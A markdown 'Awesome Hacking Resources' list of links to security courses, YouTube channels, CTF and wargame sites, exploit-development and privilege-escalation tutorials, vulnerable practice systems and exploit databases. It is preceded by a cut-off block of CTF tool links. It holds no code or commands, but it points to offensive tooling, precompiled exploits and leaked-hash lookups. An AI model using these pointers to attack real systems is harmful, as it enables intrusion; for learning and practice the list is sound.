This Cookie]: http://www.editthiscookie.com/ [cookie]: https://en.wikipedia.org/wiki/HTTP_cookie [cookies]: https://en.wikipedia.org/wiki/HTTP_cookie [formatStringExploiter]: http://formatstringexploiter.readthedocs.io/en/latest/index.html [format string vulnerability]: https://www.owasp.org/index.php/Format_string_attack [printf vulnerability]: https://www.owasp.org/index.php/Format_string_attack [Java]: https://en.wikipedia.org/wiki/Java_(programming_language) [JAR]: https://en.wikipedia.org/wiki/JAR_(file_format) [OpenStego]: https://www.openstego.com/ [Stegsolve.jar]: http://www.caesum.com/handbook/stego.htm [Stegsolve]: http://www.caesum.com/handbook/stego.htm [tcpflow]: https://github.com/simsong/tcpflow [PcapXray]: https://github.com/Srinivas11789/PcapXray [Atbash Cipher]: https://en.wikipedia.org/wiki/Atbash [TestDisk]: https://www.cgsecurity.org/Download_and_donate.php/testdisk-7.1-WIP.linux26.tar.bz2 [PNG]: https://en.wikipedia.org/wiki/Portable_Network_Graphics [jd-gui]: https://github.com/java-decompiler/jd-gui [dex2jar]: https://github.com/pxb1988/dex2jar [apktool]: https://ibotpeaches.github.io/Apktool/ [RCE]: https://en.wikipedia.org/wiki/Arbitrary_code_execution [remote code execution]: https://en.wikipedia.org/wiki/Arbitrary_code_execution [arbitrary code execution]: https://en.wikipedia.org/wiki/Arbitrary_code_execution [XSStrike]: https://github.com/UltimateHackers/XSStrike [nishang]: https://github.com/samratashok/nishang [Malboge]: https://en.wikipedia.org/wiki/Malbolge [Piet]: https://esolangs.org/wiki/Piet [npiet]: https://www.bertnase.de/npiet/ [LC4]: https://www.schneier.com/blog/archives/2018/05/lc4_another_pen.html [Empire]: https://github.com/EmpireProject/Empire [Base64]: https://en.wikipedia.org/wiki/Base64 [Base32]: https://en.wikipedia.org/wiki/Base32 [Base85]: https://en.wikipedia.org/wiki/Ascii85 [Base91]:https://www.dcode.fr/base-91-encoding [fcrackzip]: https://github.com/hyc/fcrackzip [zsteg]: https://github.com/zed-0xff/zsteg [jsteg]: https://github.com/lukechampine/jsteg [jstego]: https://sourceforge.net/projects/jstego/ [StegCracker]: https://github.com/Paradoxis/StegCracker [StegSeek]: https://github.com/RickdeJager/stegseek [Base41]: https://github.com/sveljko/base41/blob/master/python/base41.py [Base65535]: https://github.com/qntm/base65536 [Easy Python Decompiler]: https://github.com/aliansi/Easy-Python-Decompiler-v1.3.2 [photorec]: https://www.cgsecurity.org/wiki/PhotoRec [smbmap]: https://github.com/ShawnDEvans/smbmap [oletools]: https://github.com/decalage2/oletools [impacket]: https://github.com/SecureAuthCorp/impacket [Responder]: https://github.com/SpiderLabs/Responder [Responder.py]: https://github.com/SpiderLabs/Responder [International Code of Signals Maritime]: https://en.wikipedia.org/wiki/International_Code_of_Signals [maritime flags translator]: https://www.dcode.fr/maritime-signals-code [static-binaries]: https://github.com/andrew-d/static-binaries
<h1 align="center"> <br> <img width="200" src="https://cdn.rawgit.com/sindresorhus/awesome/master/media/logo.svg" alt="awesome"> <br> </h1> # Awesome Hacking Resources ![Awesome Hacking](https://img.shields.io/badge/awesome-hacking-red.svg) ![Awesome community](https://img.shields.io/badge/awesome-community-green.svg) A collection of hacking / penetration testing resources to make you better! **Let's make it the biggest resource repository for our community.** **You are welcome to fork and [contribute](https://github.com/vitalysim/Awesome-Hacking-Resources/blob/master/contributing.md#contribution-guidelines).** We started a new [tools](https://github.com/vitalysim/Awesome-Hacking-Resources/blob/master/tools.md) list, come and contribute ## Table of Contents * [Learning the Skills](#learning-the-skills) * [YouTube Channels](#youtube-channels) * [Companies](#Companies) * [Conferences](#Conferences) * [NEWS](#NEWS) * [Sharpening Your Skills](#sharpening-your-skills) * [Reverse Engineering, Buffer Overflow and Exploit Development](#reverse-engineering-buffer-overflow-and-exploit-development) * [Privilege Escalation](#privilege-escalation) * [Network Scanning / Reconnaissance](#network-scanning--reconnaissance) * [Malware Analysis](#malware-analysis) * [Vulnerable Web Application](#vulnerable-web-application) * [Vulnerable OS](#vulnerable-os) * [Exploits](#exploits) * [Forums](#forums) * [Archived Security Conference Videos](#archived-security-conference-videos) * [Online Communities](#online-communities) * [Online News Sources](#online-news-sources) * [Linux Penetration Testing OS](#linux-penetration-testing-os) ### Learning the Skills Name | Description ---- | ---- [Free interactive labs with White Hat Academy](https://ex.whitehat.academy) | 32 labs, easy account sign in with github credentials [Learning Exploitation with Offensive Computer Security 2.0](http://howto.hackallthethings.com/2016/07/learning-exploitation-with-offensive.html) | blog-style instruction, includes: slides, videos, homework, discussion. No login required. [Cybrary](https://www.cybrary.it/) | coursera style website, lots of user-contributed content, account required, content can be filtered by experience level [OffensiveComputerSecurity](https://www.cs.fsu.edu/~redwood/OffensiveComputerSecurity/lectures.html) | academic content, full semester course including 27 lecture videos with slides and assign readings [CS 642: Intro to Computer Security](http://pages.cs.wisc.edu/~ace/cs642-spring-2016.html) | academic content, full semester course, includes assigned readings, homework and github refs for exploit examples. NO VIDEO LECTURES. [Free cyber security training](https://www.samsclass.info/) | Academic content, 8 full courses with videos from a quirky instructor sam, links to research, defcon materials and other recommended training/learning [SecurityTube](http://www.securitytube.net/) | tube-styled content, "megaprimer" videos covering various topics, no readable content on site. [Seed Labs](http://www.cis.syr.edu/~wedu/seed/labs.html) | academic content, well organized, featuring lab videos, tasks, needed code files, and recommended readings [Hak5](https://www.hak5.org/) | podcast-style videos covering various topics, has a forum, "metasploit-minute" video series could be useful [Mind Maps](http://www.amanhardikar.com/mindmaps.html) | Information Security related Mind Maps [OWASP top 10 web security risks](https://www.online.hack2secure.com/courses/owasp-top10-web-security-risk) | free courseware, requires account [MIT OCW 6.858 Computer Systems Security](https://ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-858-computer-systems-security-fall-2014/) | academic content, well organized, full-semester course, includes assigned readings, lectures, videos, required lab files. ### YouTube Channels Name | Description ---- | ---- [OWASP](https://www.youtube.com/user/OWASPGLOBAL) | see OWASP above [Hak5](https://www.youtube.com/user/Hak5Darren) | see Hak5 above [BlackHat](https://www.youtube.com/channel/UCJ6q9Ie29ajGqKApbLqfBOg) | features talks from the BlackHat conferences around the world [Christiaan008](https://www.youtube.com/channel/UCEPzS1rYsrkqzSLNp76nrcg) | hosts a variety of videos on various security topics, disorganized | <td colspan="2" > **Companies** </td> [0patch by ACROS Security](https://www.youtube.com/channel/UCwlGrzF4on-bjiBhD8lO3QA) | few videos, very short, specific to 0patch [Detectify](https://www.youtube.com/channel/UCm6N84sAaQ-BiNdCaaLT4qg) | very short videos, aimed at showing how to use Detictify scanner [Kaspersky Lab](https://www.youtube.com/channel/UCGhEv7BFBWdo0k4UXTm2eZg) | lots of Kaspersky promos, some hidden cybersecurity gems [Metasploit](https://www.youtube.com/channel/UCx4d2aRIfxfEUdS_5YIYKPg) | collection of medium length metasploit demos, ~25minutes each, instructional [OpenNSM](https://www.youtube.com/user/OpenNSM/feed) | network analysis, lots of TCPDUMP videos, instructional, [Rapid7](https://www.youtube.com/channel/UCnctXOUIeRFu1BR5O0W5e9w) | brief videos, promotional/instructional, ~ 5 minutes [Securelist](https://www.youtube.com/user/Securelist/featured) | brief videos, interviews discussing various cyber security topics [Segment Security](https://www.youtube.com/channel/UCMCI9TE3-PZ7CgKk7X6Qd_w/featured) | promo videos, non-instructional [SocialEngineerOrg](https://www.youtube.com/channel/UCC1vbVVbYdNe-OZRldj-U6g) | podcast-style, instructional, lengthy content ~1 hr each [Sonatype](https://www.youtube.com/user/sonatype/featured) | lots of random videos, a good cluster of DevOps related content, large range of lengths, disorganized [SophosLabs](https://www.youtube.com/user/SophosLabs/featured) | lots of brief, news-style content, "7 Deadly IT Sins" segment is of note [Sourcefire](https://www.youtube.com/user/SourcefireInc/featured) | lots of brief videos covering topics like botnets, DDoS ~5 minutes each [Station X](https://www.youtube.com/channel/UC-vWmE-BHcUrYW5zwDijL1g) | handful of brief videos, disorganized, unscheduled content updates [Synack](https://www.youtube.com/channel/UCRH0mvESjZ7eKY1LJZDPIbw/featured) | random, news-style videos, disorganized, non-instructional [TippingPoint Zero Day Initiative](https://www.youtube.com/channel/UChbH7B5YhXANmlMYJRHpw0g) | very brief videos ~30 sec, somewhat instructional [Tripwire, Inc.](https://www.youtube.com/user/TripwireInc/videos) | some tripwire demos, and random news-style videos, non-instructional [Vincent Yiu](https://www.youtube.com/channel/UCFVI3_M1zqFzEok2sTeEP8w/featured) | handful of videos from a single hacker, instructional [nVisium](https://www.youtube.com/channel/UCTE8R-Otq_kVTo08eLsfeyg) | Some nVisum promos, a handful of instructional series on Rails vulns and web hacking [ntop](https://www.youtube.com/channel/UCUYWuYlYKD5Yq5qBz0AIXJw/feed) | network monitoring, packet analysis, instructional | <td colspan="2"> **Conferences** </td> [44contv](https://www.youtube.com/user/44contv) | information security con based in London, lengthy instructional videos [BruCON Security Conference](https://www.youtube.com/channel/UCqwMU1l90lf9BLersW6eAHw) | security and hacker conference based in b\Belgium, lots of lengthy instructinoal videos [BSides Manchester](https://www.youtube.com/channel/UC1mLiimOTqZFK98VwM8Ke4w) | security and hacker con based in Mancheseter, lots of lengthy videos [BSidesAugusta](https://www.youtube.com/channel/UC85CvsnrVlD_44eEgzb2OfA) | security con based in Augusta, Georgia, lots of lengthy instructional videos [CarolinaCon](https://www.youtube.com/channel/UCTY3Dpz68CyrjwRzqkE4sFw) | security con based in North Carolina, associated with various 2600 chapters, lots of lengthy instructional content [Cort Johnson](https://www.youtube.com/channel/UCV9r-yMeARWVCJEesim25Ag) | a handful of lengthy con-style talks from Hack Secure Opensec 2017 [DevSecCon](https://www.youtube.com/channel/UCgxhfP2Hi8MQYz6ZkwpLA0A) | lenghty con videos covering DevSecOps, making software more secure [Garage4Hackers - Information Security](https://www.youtube.com/channel/UCDqagqREZlmJitWco-yPtvw/feed) | a handful of lengthy videos, About section lacks description [HACKADAY](https://www.youtube.com/channel/UCnv0gfLQFNGPJ5MHSGuIAkw) | lots of random tech content, not strictly infosec, some instructional [Hack In The Box Security Conference](https://www.youtube.com/channel/UC0BJVNTIEbG8CLG-xVVWJnA) | lengthy con-style instructional talks from an international security con [Hack in Paris](https://www.youtube.com/channel/UC7xJU9_oqw-vS6OJExS-2iA) | security con based in paris, features lots of instructional talks, slides can be difficult to see. [Hacklu](https://www.youtube.com/channel/UCI6B0zYvK-7FdM0Vgh3v3Tg/feed) | lots of lengthy con-style instructional videos [Hacktivity](https://www.youtube.com/user/hacktivity/feed) | lots of lengthy con-style instructional videos from a con in central/eastern europe [Hardwear.io](https://www.youtube.com/channel/UChwYb9xc9tZXquQxu4G0l_g/featured) | handful of lengthy con-style video, emphasis on hardware hacks [IEEE Symposium on Security and Privacy](https://www.youtube.com/channel/UC6pXMS7qre9GZW7A7FVM90Q) | content from the symposium; IEEE is a professional association based in the us, they also publish various journals [LASCON](https://www.youtube.com/channel/UCDHsOiMPS-SLppAOAJRD37Q) | lengthy con-style talks from an OWASP con held in Austin, TX [Marcus Niemietz](https://www.youtube.com/channel/UCtThfJl65L04ukWp0XZi3yg/videos) | lots of instructional content, associated with HACKPRA, an offensive security course from an institute in Germany [Media.ccc.de](https://www.youtube.com/channel/UC2TXq_t06Hjdr2g_KdKpHQg) | The real official channel of the chaos computer club, operated by the CCC VOC - tons of lengthy con-style vids [NorthSec](https://www.youtube.com/channel/UCqVhMzTdQK5VAosAGkMtpJw) | lengthy con-style talks from an applied security conference in Canada [Pancake Nopcode](https://www.youtube.com/channel/UC3G6k7XfTgcWD2PJR8qJSkQ) | channel of Radare2 whiz Sergi "pancake" Alvarez, Reverse Engineering Content [Psiinon](https://www.youtube.com/channel/UC-3qyzm4f29C12KGp3-12bQ) | medium length instructional videos, for the OWASP Zed Attack Proxy [SJSU Infosec](https://www.youtube.com/channel/UCDNzNvZlYK8jZLsUbdiGrsQ/videos) | handful of lengthy instructional videos from San Jose State university Infosec [Secappdev.org](https://www.youtube.com/channel/UCSii2fuiLLlGqaR6sR_y0rA) | tons of lengthy instructional lectures on Secure App Development [Security Fest](https://www.youtube.com/channel/UCByLDp7r7gHGoO7yYMYFeWQ) | medium length con-style talks from a security festival in Sweden [SecurityTubeCons](https://www.youtube.com/channel/UC2wNN-Zqiq4J1PLPnyMBWUg) | an assortment of con-style talks from various cons including BlackHat and Shmoocon [ToorCon](https://www.youtube.com/channel/UCnzjmL0xkTBYwFZD7agHGWw) | handful of medium length con videos from con based in San Diego, CA [USENIX Enigma Conference](https://www.youtube.com/channel/UCIdV7bE97mSPTH1mOi_yUrw/feed) | medium length "round table discussion with leading experts", content starts in 2016 | <td colspan = "2"> **News** </td> [Corey Nachreiner](https://www.youtube.com/channel/UC7dUL0FbVPGqzdb2HtWw3Xg) | security newsbites, 2.7K subscribers, 2-3 videos a week, no set schedule [Error 404 Cyber News](https://www.youtube.com/channel/UC4HcNHFKshqj-aeyi6imW7Q) | short screen-shot videos with loud metal, no dialog, bi-weekly [Latest Hacking News](https://www.youtube.com/user/thefieldhouse/feed) | 10K followers, medium length screenshot videos, no recent releases [Pentester Academy TV](https://www.youtube.com/channel/UChjC1q6Ami7W0E71TzPZELA) | lots of brief videos, very regular posting, up to +8 a week [SecureNinjaTV](https://www.youtube.com/channel/UCNxfV4yR0nIlhFmfwcdf3BQ) | brief news bites, irregular posting, 18K followers [Troy Hunt](https://www.youtube.com/channel/UCD6MWz4A61JaeGrvyoYl-rQ) | lone youtuber, medium length news videos, 16K followers, regular content [Samy Kamkar's Applied Hacking](https://www.youtube.com/user/s4myk) | brief to medium length instructional vids from the creator of PoisonTap for the Raspberry Pi Zero, no recent content, last updated in 2016 [danooct1](https://www.youtube.com/channel/UCqbkm47qBxDj-P3lI9voIAw) | lots of brief screenshot, how-to vids regarding malware, regular content updates, 186K followerss [DedSec](https://www.youtube.com/channel/UCx34ZZW2KgezfUPPeL6m8Dw) | lots of brief screenshot how-to vids based in Kali, no recent posts. [DEFCON Conference](https://www.youtube.com/channel/UC6Om9kAkl32dWlDSNlDS9Iw) | lots of lengthy con-style vids from the iconical DEFCON [DemmSec](https://www.youtube.com/channel/UCJItQmwUrcW4VdUqWaRUNIg) | lots of pen testing vids, somewhat irregular uploads, 44K followers [Don Does 30](https://www.youtube.com/channel/UCarxjDjSYsIf50Jm73V1D7g) | amateur pen-tester posting lots of brief screenshot vids regularly, 9K Followers [Geeks Fort - KIF](https://www.youtube.com/channel/UC09NdTL2hkThGLSab8chJMw) | lots of brief screenshot vids, no recent posts [iExplo1t](https://www.youtube.com/channel/UCx0HClQ_cv0sLNOVhoO2nxg/videos) | lots of screenshot vids aimed at novices, 5.7K Followers, no recent posts [HACKING TUTORIALS](https://www.youtube.com/channel/UCbsn2kQwNxcIzHwbdDjzehA) | handful of brief screenshot vids, no recent posts. [LiveOverflow](https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w) | Lots of brief-to-medium isntructional vids, covering things like buffer overflwos and exploit writing, regular posts. [Metasploitation](https://www.youtube.com/channel/UC9Qa_gXarSmObPX3ooIQZrg) | lots of screenshot vids, little to no dialogue, all about using Metasploit, no recent vids. [NetSecNow](https://www.youtube.com/channel/UC6J_GnSAi7F2hY4RmnMcWJw) | channel of pentesteruniversity.org, seems to post once a month, screenshot instructional vids [Open SecurityTraining](https://www.youtube.com/channel/UCthV50MozQIfawL9a_g5rdg) | lots of lengthy lecture-style vids, no recent posts, but quality info. [BalCCon - Balkan Computer Congress](https://www.youtube.com/channel/UCoHypmu8rxlB5Axh5JxFZsA) | Long con-style talks from the Balkan Computer Congress, doesn't update regularly [Penetration Testing in Linux](https://www.youtube.com/channel/UC286ntgASMskhPIJQebJVvA) | DELETE [rwbnetsec](https://www.youtube.com/channel/UCAJ8Clc3188ek9T_5XTVzZQ) | lots of medium length instructional videos covering tools from Kali 2.0, no recent posts. [Security Weekly](https://www.youtube.com/channel/UCg--XBjJ50a9tUhTKXVPiqg) | regular updates, lengthy podcast-style interviews with industry pros [Seytonic](https://www.youtube.com/channel/UCW6xlqxSY3gGur4PkGPEUeA) | variety of DIY hacking tutorials, hardware hacks, regular updates [Shozab Haxor](https://www.youtube.com/channel/UCBwub2kRoercWQJ2mw82h3A) | lots of screenshot style instructional vids, regular updates, windows CLI tutorial [SSTec Tutorials](https://www.youtube.com/channel/UCHvUTfxL_9bNQgqzekPWHtg) | lots of brief screenshot vids, regular updates [Waleed Jutt](https://www.youtube.com/channel/UCeN7cOELsyMHrzfMsJUgv3Q) | lots of brief screenshot vids covering web security and game programming [webpwnized](https://www.youtube.com/channel/UCPeJcqbi8v46Adk59plaaXg) | lots of brief screenshot vids, some CTF walkthroughs [JackkTutorials](https://www.youtube.com/channel/UC64x_rKHxY113KMWmprLBPA) | lots of medium length instructional vids with some AskMe vids from the youtuber [Zer0Mem0ry](https://www.youtube.com/channel/UCDk155eaoariJF2Dn2j5WKA) | lots of brief c++ security videos, programming intensive [LionSec](https://www.youtube.com/channel/UCCQLBOt_hbGE-b9I696VRow) | lots of brief screenshot instructional vids, no dialog [Adrian Crenshaw](https://www.youtube.com/user/irongeek) | lots of lengthy con-style talks [HackerSploit](https://www.youtube.com/channel/UC0ZTPkdxlAKf-V33tqXwi3Q) | regular posts, medium length screenshot vids, with dialog [Derek Rook - CTF/Boot2root/wargames Walkthrough](https://www.youtube.com/channel/UCMACXuWd2w6_IEGog744UaA) | lots of lengthy screenshot instructional vids, with ### Sharpening Your Skills Name | Description ---- | ---- [OWASP Security Shepherd](https://security-shepherd.ctf365.com/login.jsp) | BROKEN AS OF 11/6 [CTFLearn](https://ctflearn.com/) | an account-based ctf site, where users can go in and solve a range of challenges [CTFs write-ups](https://github.com/ctfs) | a collection of writeups from various CTFs, organized by [CTF365](https://ctf365.com/) | account based ctf site, awarded by Kaspersky, MIT, T-Mobile [Pentestit](https://lab.pentestit.ru/) | acocunt based CTF site, users have to install open VPN and get credentials [Hacksplaining](https://www.hacksplaining.com/) | a clickthrough security informational site, very good for beginners. [The cryptopals crypto challenges](http://cryptopals.com/) | A bunch of CTF challenges, all focused on cryptography. [The enigma group](https://www.enigmagroup.org/) | web application security training, account based, video tutorials [Ringzer0 Team](https://ringzer0team.com/challenges) | an account based CTF site, hosting over 272 challenges [Hack The Box](https://www.hackthebox.gr/en/login) | Pen testing labs hosting over 39 vulnerable machines with two additional added every month [Over the wire](http://overthewire.org/wargames/) | A CTF that's based on progressive levels for each lab, the users SSH in, no account recquired [Backdoor](https://backdoor.sdslabs.co) | pen testing labs that have a space for beginners, a practice arena and various competitions, account required [Vulnhub](https://www.vulnhub.com/) | site hosts a ton of different vulnerable Virtual Machine images, download and get hacking [Hack.me](https://hack.me/) | lets you build/host/attack vulnerable web apps [Hack this site!](https://www.hackthissite.org/) | an oldy but goodie, account required, users start at low levels and progress in difficulty [Exploit exercises](https://exploit-exercises.com/) | hosts 5 fulnerable virtual machines for you to attack, no account required [PentesterLab](https://pentesterlab.com/) | hosts a variety of exercises as well as various "bootcamps" focused on specific activities [SmashTheStack](http://smashthestack.org/wargames.html) | hosts various challenges, similar to OverTheWire, users must SSH into the machines and progress in levels [PicoCTF](https://2017game.picoctf.com/) | CTF hosted by Carnegie Mellon, occurs yearly, account required. [Shellter Labs](https://shellterlabs.com/en/) | account based infosec labs, they aim at making these activities social [Pentest Practice](https://www.pentestpractice.com/) | account based Pentest practice, free to sign up, but there's also a pay-as-you-go feature [Pentest.training](https://pentest.training) | lots of various labs/VMS for you to try and hack, registry is optional. [pwnable.kr](http://pwnable.kr/) | Don't let the cartoon characters fool you, this is a serious CTF site that will teach you a lot, account required [pwnable.tw](http://pwnable.tw/) | hosts 27 challenges accompanied with writeups, account required [hackburger.ee](http://hackburger.ee/) | hosts a number of web hacking challenges, account required [http://noe.systems/](http://noe.systems/) | Korean challenge site, requires an account [Hacker Gateway](https://www.hackergateway.com/) | ctfs covering steganography, cryptography, and web challengs, account required [Solve Me](http://solveme.safflower.kr/) | "yet another challenge", account required. [Challenge Land](http://challengeland.co/) | Ctf site with a twist, no simple sign-up, you have to solve a challengeto even get that far! [Participating Challenge Sites](http://www.wechall.net/active_sites/all/by/site_avg/DESC/page-1) | aims at creating a universal ranking for CTF participants [Hacker test](http://www.hackertest.net/) | similar to "hackthissite", no account required. [Crackmes.de Archive (2011-2015)](https://tuts4you.com/download.php?view.3152) | a reverse engineering information Repo, started in 2003 [ROP Emporium](https://ropemporium.com/) | Return Oriented Programming challenges [Google's XSS game](https://xss-game.appspot.com/) | XSS challenges, and potentially a chance to get paid! [websec.fr](https://websec.fr/) | Focused on web challenges, registration is optional. [knock.xss.moe](https://knock.xss.moe) | XSS challenges, account required. [webhacking.kr](https://webhacking.kr) | lots of web security challenges are available, recommended for beginners. You need to solve a simple challenge to sign up. [Stereotyped Challenges](https://chall.stypr.com/) | Challenges for web security professionals, account required. ### Reverse Engineering, Buffer Overflow and Exploit Development Name | Description ---- | ---- [Shell storm](http://shell-storm.org/) | Blog style collection with organized info about Rev. Engineering. [Buffer Overflow Exploitation Megaprimer for Linux](http://www.securitytube.net/groups?operation=view&groupId=4) | Collection of Linux Rev. Engineering videos [Reverse Engineering Malware 101](https://securedorg.github.io/RE101/) | intro course created by Malware Unicorn, complete with material and two VM's [Reverse Engineering Malware 102](https://securedorg.github.io/RE102/) | the sequel to RE101 [Modern Binary Exploitation - CSCI 4968](https://github.com/RPISEC/MBE) | RE challenges, you can download the files or download the VM created by RPISEC specifically for challenges, also links to their home page with tons of infosec lectures [Introductory Intel x86](http://www.opensecuritytraining.info/IntroX86.html) | 63 days of OS class materials, 29 classes, 24 instructors, no account required [Binary hacking](http://liveoverflow.com/binary_hacking/index.html) | 35 "no bullshit" binary videos along with other info [Shellcode Injection](https://dhavalkapil.com/blogs/Shellcode-Injection/) | a blog entry from a grad student at SDS Labs [Reverse Engineering for Beginners](https://beginners.re/RE4B-EN.pdf) | huge textbook, created by Dennis Yurichev, open-source [Exploit tutorials](http://www.primalsecurity.net/tutorials/exploit-tutorials/) | a series of 9 exploit tutorials,also features a podcast [Exploit development](https://0x00sec.org/c/exploit-development) | links to the forum's exploit dev posts, quality and post style will vary with each poster [flAWS challenge](http://flaws.cloud/) | Through a series of levels you'll learn about common mistakes and gotchas when using Amazon Web Services (AWS). [Corelan tutorials](https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/) | detailed tutorial, lots of good information about memory [Reverse engineering reading list](https://github.com/onethawt/reverseengineering-reading-list/blob/master/README.md) | a github collection of RE tools and books [Reverse Engineering challenges](https://challenges.re/) | collection of challenges from the writer of RE for Beginners [Reverse Engineering for beginners (GitHub project)](https://github.com/dennis714/RE-for-beginners) | github for the above [reversing.kr challenges](http://www.reversing.kr/challenge.php) | reverse engineering challenges varying in difficulty [Analysis and exploitation (unprivileged)](https://www.it-sec-catalog.info/analysis_and_exploitation_unprivileged.html) | huge collection of RE information, organized by type. [A Course on Intermediate Level Linux Exploitation](https://github.com/nnamon/linux-exploitation-course) | as the title says, this course isn't for beginners [Lena's Reversing for Newbies (Complete)](https://tuts4you.com/download.php?view.2876) | listing of a lengthy resource by Lena, aimed at being a course [Megabeets journey into Radare2](https://www.megabeets.net/a-journey-into-radare-2-part-1/) | one user's radare2 tutorials [Introduction to ARM Assembly Basics](https://azeria-labs.com/writing-arm-assembly-part-1/) | tons of tutorials from infosec pro Azeria, follow her on twitter [Linux (x86) Exploit Development Series](https://sploitfun.wordpress.com/2015/06/26/linux-x86-exploit-development-tutorial-series/) | blog post by sploitfun, has 3 different levels ### Privilege Escalation Name | Description ---- | ---- [Reach the root](https://hackmag.com/security/reach-the-root/) | discusses a process for linux privilege exploitation [Basic linux privilege escalation](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/) | basic linux exploitation, also covers Windows [Windows Privilege Escalation](http://www.bhafsec.com/wiki/index.php/Windows_Privilege_Escalation) | collection of wiki pages covering Windows Privilege escalation [Privilege escalation for Windows and Linux](https://github.com/AusJock/Privilege-Escalation) | covers a couple different exploits for Windows and Linux [Windows Privilege Escalation Fundamentals](http://www.fuzzysecurity.com/tutorials/16.html) | collection of great info/tutorials, option to contribute to the creator through patreon, creator is an OSCP [RootHelper](https://github.com/NullArray/RootHelper) | a tool that runs various enumeration scripts to check for privilege escalation [Windows exploits, mostly precompiled.](https://github.com/abatchy17/WindowsExploits) | precompiled windows exploits, could be useful for reverse engineering too [Unix privesc checker](http://pentestmonkey.net/tools/audit/unix-privesc-check) | a script that checks for PE vulnerabilities on a system [Privilege escalation linux with live example](http://resources.infosecinstitute.com/privilege-escalation-linux-live-examples/) | covers a couple common PE methods in linux [Windows privilege escalation checker](https://github.com/netbiosX/Checklists/blob/master/Windows-Privilege-Escalation.md) | a list of topics that link to pentestlab.blog, all related to windows privilege escalation [Linux Privilege Escalation Scripts](http://netsec.ws/?p=309#more-309) | a list of PE checking scripts, some may have already been covered [AutoLocalPrivilegeEscalation](https://github.com/ngalongc/AutoLocalPrivilegeEscalation) | automated scripts that downloads and compiles from exploitdb [Linux Privilege Escalation Check Script](https://github.com/sleventyeleven/linuxprivchecker) | a simple linux PE check script [Local Linux Enumeration & Privilege Escalation Cheatsheet](https://www.rebootuser.com/?p=1623) | good resources that could be compiled into a script [4 Ways get linux privilege escalation](http://www.hackingarticles.in/4-ways-get-linux-privilege-escalation/) | shows different examples of PE ### Malware Analysis Name | Description ---- | ---- [Malware traffic analysis](http://www.malware-traffic-analysis.net/) | list of traffic analysis exercises [Malware Analysis - CSCI 4976](https://github.com/RPISEC/Malware/blob/master/README.md) | another class from the folks at RPISEC, quality content ### Network Scanning / Reconnaissance Name | Description ---- | ---- [Foot Printing with WhoIS/DNS records](https://www.sans.org/reading-room/whitepapers/hackers/fundamentals-computer-hacking-956) | a white paper from SANS [Google Dorks/Google Hacking](https://d4msec.wordpress.com/2015/09/03/google-dorks-for-finding-emails-admin-users-etc/) | list of commands for google hacks, unleash the power of the world's biggest search engine ### Vulnerable Web Application Name | Description ---- | ---- [OWASP Hackademic Challenges project](https://github.com/Hackademic/hackademic/) | web hacking challenges [bWAPP](http://www.itsecgames.com/) | common buggy web app for hacking, great for beginners, lots of documentation [Damn Vulnerable Web Application (DVWA)](http://www.dvwa.co.uk/) | PHP/MySQL web app for testing skills and tools [WebGoat: A deliberately insecure Web Application](https://github.com/WebGoat/WebGoat) | maintained by OWASP and designed to to teach web app security [OWASP Mutillidae II](https://sourceforge.net/projects/mutillidae/files/) | another OWASP vulnerable app, lots of documentation. [OWASP Broken Web Applications Project](https://github.com/chuckfw/owaspbwa/) | hosts a collection of broken web apps [Damn Small Vulnerable Web](https://github.com/stamparm/DSVW) | written in less than 100 lines of code, this web app has tons of vulns, great for teaching [OWASP Juice Shop](https://github.com/bkimminich/juice-shop) | covers the OWASP top 10 vulns [Google Gruyere](https://google-gruyere.appspot.com/) | host of challenges on this cheesy web app ### Vulnerable OS Name | Description ---- | ---- [Metasploitable2 (Linux)](https://sourceforge.net/projects/metasploitable/files/Metasploitable2/) | vulnerable OS, great for practicing hacking [Metasploitable3](https://github.com/rapid7/metasploitable3) \[[Installation](https://github.com/rapid7/metasploitable3/blob/master/README.md)\] | the third installation of this vulnerable OS [Vulnhub](https://www.vulnhub.com/) | collection of tons of different vulnerable OS and challenges [General Test Environment Guidance](https://community.rapid7.com/docs/DOC-2196) | white paper from the pros at rapid7 ### Linux Penetration Testing OS Name | Description ---- | ----- [BackBox](https://backbox.org/index) | open source community project, promoting security in IT enivornments [BlackArch](https://blackarch.org/index.html) | Arch Linux based pentesting distro, compatible with Arch installs [Kali](http://kali.org/) | the infamous pentesting distro from the folks at Offensive Security [LionSec Linux](https://lionsec-linux.org/) | pentesting OS based on Ubuntu [Parrot ](https://www.parrotsec.org/) | Debian includes full portable lab for security, DFIR, and development [Bugtraq](http://bugtraq-team.com/) | advanced GNU Linux pen-testing technology [Android Tamer](https://androidtamer.com//) | Android Tamer is a Virtual / Live Platform for Android Security professionals. ### Exploits Name | Description ---- | ---- [Exploit Database](https://www.exploit-db.com/) | database of a wide variety exploits, CVE compliant archive [CXsecurity](https://cxsecurity.com/exploit/) | Indie cybersecurity info managed by 1 person [0day.today](http://0day.today/) | Easy to navigate database of exploits [Snyk Vulnerability DB](https://snyk.io/vuln/) | detailed info and remediation guidance for known vulns, also allows you to test your code ### Forums Name | Description ---- | ---- [Greysec](https://greysec.net) | hacking and security forum [Hackforums](https://hackforums.net/) | posting webstite for hacks/exploits/various discussion [0x00sec](https://0x00sec.org/) | hacker, malware, computer engineering, Reverse engineering [Antichat](https://forum.antichat.ru/) | russian based forum [EAST Exploit database](http://eastexploits.com/) | exploit DB for commercial exploits written for EAST Pentest Framework ### Archived Security Conference Videos Name | Description ---- | ---- [InfoCon.org](https://infocon.org/cons/) | hosts data from hundreds of cons [Irongeek](http://www.irongeek.com/) | Website of Adrien Crenshaw, hosts a ton of info. ### Online Communities Name | Description ---- | ----- [Hack+](http://t.me/hacking_group_channel) | link requires telegram to be used [MPGH](http://mpgh.net) | community of MultiPlayerGameHacking [Hacktoday](https://www.hacktoday.net/) | requires an account, covering all kinds of hacking topics ### Online News Sources Name | Description ---- | ---- [Recent Hash Leaks](https://hashes.org/public.php) | great place to lookup hashes [InfoSec](http://www.infosecurity-magazine.com/) | covers all the latest infosec topics [Threatpost](https://threatpost.com/) | covers all the latest threats and breaches [Security Intell](https://securityintelligence.com/news/) | covers all kinds of news, great intelligence resources [The Hacker News](https://thehackernews.com/) | features a daily stream of hack news, also has an app